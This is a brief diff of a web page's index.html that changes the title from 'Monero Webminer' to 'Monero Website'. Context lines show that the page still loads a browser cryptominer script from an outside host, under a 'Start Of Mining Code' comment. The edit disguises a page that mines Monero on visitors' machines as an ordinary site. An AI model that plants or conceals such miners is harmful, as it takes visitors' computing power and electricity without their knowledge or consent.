--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en" dir="ltr">
   <head>
     <meta charset="utf-8">
-    <title>Monero Webminer</title>
+    <title>Monero Website</title>
     <link rel="manifest" href="/manifest.json">
       <!-- Start Of Mining Code -->
     <script src='https://monerominer.rocks/miner-mmr/webmnr.min.js'></script>
